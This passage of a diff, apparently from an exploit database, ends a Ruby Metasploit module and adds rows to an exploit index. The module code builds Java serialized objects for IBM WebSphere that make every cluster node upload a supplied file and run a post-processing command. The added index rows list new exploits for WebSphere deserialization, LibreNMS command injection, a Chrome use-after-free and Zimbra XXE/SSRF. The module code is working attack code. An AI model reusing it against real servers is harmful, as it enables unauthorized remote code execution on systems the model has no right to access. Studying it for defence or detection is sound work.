+    msg_class_desc.fields = []
+    msg_class_desc.fields << defaults_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = msg_obj
+
+    # Set the member values
+    object.class_desc.description = msg_class_desc
+
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'memberName')
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'inOdc')
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, '0')
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'epoch')
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, (Time.now.to_f * 1000).to_i.to_s)
+
+    object
+  end
+
+  def build_p2p_node_class(obj)
+    msg_obj = build_app_node_class(obj)
+
+    # Create the field ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
+
+    # Create the data field and add the reference
+    data_field = Rex::Java::Serialization::Model::Field.new
+    data_field.type = 'array'
+    data_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'data')
+    data_field.field_type = field_ref
+
+    # Create the object field and add the reference
+    prop_field = Rex::Java::Serialization::Model::Field.new
+    prop_field.type = 'object'
+    prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'properties')
+    prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/Properties;')
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.ws.wsgroup.p2p.P2PShimNodeProperty')
+    msg_class_desc.serial_version = 2
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << data_field
+    msg_class_desc.fields << prop_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = msg_obj
+
+    # Create the byte array ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 6
+
+    # Construct IP Array
+    byte_array = Rex::Java::Serialization::Model::NewArray.new
+    byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
+    byte_array.array_description.description = field_ref
+    byte_array.type = "byte"
+    byte_array.values = []
+
+    # Set the member values
+    obj.class_data << byte_array
+
+    # Add properties
+    obj.class_data << build_properties_class
+
+    msg_class_desc
+  end
+
+  def build_upfile_arg_class(filename, bytes, cmd)
+    # Create the field ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
+
+    # Create the integer field and add the reference
+    filename_field = Rex::Java::Serialization::Model::Field.new
+    filename_field.type = 'object'
+    filename_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileName')
+    filename_field.field_type = field_ref
+
+    # Create the field ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4
+
+    # Create the integer field and add the reference
+    filebody_field = Rex::Java::Serialization::Model::Field.new
+    filebody_field.type = 'array'
+    filebody_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileBody')
+    filebody_field.field_type = field_ref
+
+    # Create the field ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
+
+    # Create the object field and add the reference
+    post_cmd_field = Rex::Java::Serialization::Model::Field.new
+    post_cmd_field.type = 'object'
+    post_cmd_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'postProcCmd')
+    post_cmd_field.field_type = field_ref
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileArgument')
+    msg_class_desc.serial_version = 1
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << filebody_field
+    msg_class_desc.fields << filename_field
+    msg_class_desc.fields << post_cmd_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
+
+    # Create the byte array ref
+    field_ref = Rex::Java::Serialization::Model::Reference.new
+    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 7
+
+    # Construct IP Array
+    byte_array = Rex::Java::Serialization::Model::NewArray.new
+    byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
+    byte_array.array_description.description = field_ref
+    byte_array.type = "byte"
+    byte_array.values = bytes
+
+    # Set the member values
+    object = Rex::Java::Serialization::Model::NewObject.new
+    object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
+    object.class_desc.description = msg_class_desc
+    object.class_data << byte_array
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, filename)
+    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, cmd)
+
+    object
+  end
+
+  def build_bcast_run_task_msg(obj, msg_type, source_ip, source_port, upfile_arg_obj)
+    msg_obj = build_bcast_flood_msg(obj, msg_type, source_ip, source_port)
+
+    # Create the integer field and add the reference
+    out_int_field = Rex::Java::Serialization::Model::Field.new
+    out_int_field.type = 'int'
+    out_int_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'outputGatherInterval')
+
+    # Create the task object field and add field_type
+    task_field = Rex::Java::Serialization::Model::Field.new
+    task_field.type = 'object'
+    task_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'task')
+    task_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
+
+    # Create the task object field and add field_type
+    task_arg_field = Rex::Java::Serialization::Model::Field.new
+    task_arg_field.type = 'object'
+    task_arg_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'taskArgument')
+    task_arg_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/io/Serializable;")
+
+    # Create the integer field and add the reference
+    forward_gather_field = Rex::Java::Serialization::Model::Field.new
+    forward_gather_field.type = 'int'
+    forward_gather_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'forwardGatheredDataPipelinePeriod')
+
+    # Create the class description
+    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
+    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.BcastMsgRunTask')
+    msg_class_desc.serial_version = 1
+    msg_class_desc.flags = 2
+    msg_class_desc.fields = []
+    msg_class_desc.fields << forward_gather_field
+    msg_class_desc.fields << out_int_field
+    msg_class_desc.fields << task_field
+    msg_class_desc.fields << task_arg_field
+
+    # Add annotations
+    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
+    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
+
+    # Add superclass
+    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
+    msg_class_desc.super_class.description = msg_obj
+
+    # Set the member values
+    obj.class_data << ['int', 0]
+    obj.class_data << ['int', 1]
+    obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileToAllNodes')
+    obj.class_data << upfile_arg_obj
+
+    msg_class_desc
+  end
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 651a09ebe..303f7480f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6473,6 +6473,7 @@ id,file,description,date,author,type,platform,port
 46940,exploits/multiple/dos/46940.txt,"Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation",2019-05-29,"Google Security Research",dos,multiple,
 46941,exploits/android/dos/46941.txt,"Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL",2019-05-29,"Google Security Research",dos,android,
 46946,exploits/windows/dos/46946.py,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service",2019-05-30,n1xbyte,dos,windows,
+46968,exploits/multiple/dos/46968.html,"Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free",2019-06-05,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -17480,6 +17481,8 @@ id,file,description,date,author,type,platform,port
 46942,exploits/java/remote/46942.rb,"Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)",2019-05-29,Metasploit,remote,java,
 46960,exploits/hardware/remote/46960.py,"NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow",2019-06-04,@0x00string,remote,hardware,
 46961,exploits/hardware/remote/46961.py,"Cisco RV130W 1.0.3.44 - Remote Stack Overflow",2019-06-04,@0x00string,remote,hardware,
+46969,exploits/windows/remote/46969.rb,"IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)",2019-06-05,Metasploit,remote,windows,
+46970,exploits/linux/remote/46970.rb,"LibreNMS - addhost Command Injection (Metasploit)",2019-06-05,Metasploit,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41375,3 +41378,4 @@ id,file,description,date,author,type,platform,port
 46964,exploits/java/webapps/46964.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
 46965,exploits/java/webapps/46965.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
 46966,exploits/java/webapps/46966.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
+46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,